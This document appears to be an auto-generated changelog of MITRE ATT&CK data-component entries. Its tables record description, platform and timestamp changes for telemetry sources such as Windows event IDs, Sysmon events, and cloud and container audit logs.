| created | 2021-10-20T15:05:19.271772Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-11-10T09:30:48.699233Z | 2021-11-10T09:30:48.699Z |
| Description |
|---|
| Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms[0] | Windows | Azure AD |
| x_mitre_platforms[1] | Linux | Google Workspace |
| x_mitre_platforms[2] | macOS | Linux |
| x_mitre_platforms[3] | SaaS | Office 365 |
| x_mitre_platforms[4] | Office 365 | SaaS |
| x_mitre_platforms[5] | Azure AD | Windows |
| x_mitre_platforms[6] | Google Workspace | macOS |
| x_mitre_collection_layers[0] | Host | Cloud Control Plane |
| x_mitre_collection_layers[1] | Cloud Control Plane | Host |
| created | 2021-10-20T15:05:19.271876Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271876Z | 2022-03-30T14:26:51.807Z |
| Description |
|---|
| A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | [] |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273872Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273872Z | 2022-05-11T14:00:00.188Z |
| Description |
|---|
| A set of containerized computing resources that are managed together but have separate nodes to execute various tasks and/or applications(Citation: Kube Cluster Admin)(Citation: Kube Cluster Info) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | True | |
| x_mitre_domains | ['enterprise-attack'] | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-10T09:30:48.694817Z | 2022-10-20T20:54:47.329Z |
| created | 2021-10-20T15:05:19.274720Z | 2021-10-20T15:05:19.274Z |
| external_references[0]['url'] | https://attack.mitre.org/datasources/DS0031 | https://attack.mitre.org/data-sources/DS0031 |
| Description |
|---|
| Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275511Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275511Z | 2022-05-02T23:19:55.148Z |
| Description |
|---|
| A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274206Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274206Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274227Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274227Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Initial construction of a new active directory object (ex: Windows EID 5137) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274137Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274137Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Removal of an active directory object (ex: Windows EID 5141) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274159Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274159Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Changes made to an active directory object (ex: Windows EID 5163 or 5136) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274183Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274183Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272957Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272957Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275437Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275437Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274044Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274044Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| An extracted list of cloud services (ex: AWS ECS ListServices) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274066Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274066Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a cloud service and activity around it such as name, type, or purpose/function |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274019Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274019Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274087Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274087Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272529Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272529Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272419Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272419Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272467Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272467Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272508Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272508Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272487Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272487Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272445Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272445Z | 2021-10-20T15:05:19.272Z |
| Old Description | New Description |
|---|---|
| Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history) | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.273156Z | 2022-10-07T16:14:39.124Z |
| description | Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history) | The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. ) |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.273156Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a new container (ex: docker create |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274861Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274861Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| An extracted list of containers (ex: docker ps) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274904Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274904Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Activation or invocation of a container (ex: docker start or docker restart) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274928Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274928Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Information about domain name assignments and other domain metadata (ex: WHOIS) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275531Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275531Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Opening of a data storage device with an assigned drive letter or mount point |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273087Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273087Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a drive letter or mount point to a data storage device |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273011Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273011Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a drive letter or mount point of a data storage device |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273061Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273061Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274308Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274308Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274285Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274285Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273770Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273770Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a new file (ex: Sysmon EID 11) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273724Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273724Z | 2021-10-20T15:05:19.273Z |
| Old Description | New Description |
|---|---|
| Removal of a file (ex: Sysmon EID 23) | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273745Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273745Z | 2022-03-30T14:26:51.805Z |
| description | Removal of a file (ex: Sysmon EID 23) | Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules) |
| Description |
|---|
| Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273701Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273701Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273791Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273791Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273233Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273233Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273275Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273275Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Contextual data about a firewall and activity around it such as name, policy, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273209Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273209Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273254Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273254Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271356Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271356Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| An extracted list of available groups and/or their associated settings (ex: AWS list-groups) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275365Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275365Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275303Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275303Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275385Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275385Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | False | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.272689Z | 2022-10-20T20:22:45.613Z |
| x_mitre_version | 1.0 | 1.1 |
| created | 2021-10-20T15:05:19.272689Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271986Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271986Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Removal of a virtual machine image (ex: Azure Compute Service Images DELETE) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272030Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272030Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Contextual data about a virtual machine image such as name, resource group, state, or type |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272052Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272052Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.272009Z | 2021-10-20T15:05:19.272Z |
| modified | 2021-10-20T15:05:19.272009Z | 2021-10-20T15:05:19.272Z |
| Description |
|---|
| Initial construction of a new instance (ex: instance.insert within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274569Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274569Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Removal of an instance (ex: instance.delete within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274612Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274612Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274654Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274654Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about an instance and activity around it such as name, type, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274633Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274633Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274591Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274591Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Activation or invocation of an instance (ex: instance.start within GCP Audit Logs) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.274676Z | 2021-10-20T15:05:19.274Z |
| modified | 2021-10-20T15:05:19.274676Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs) |
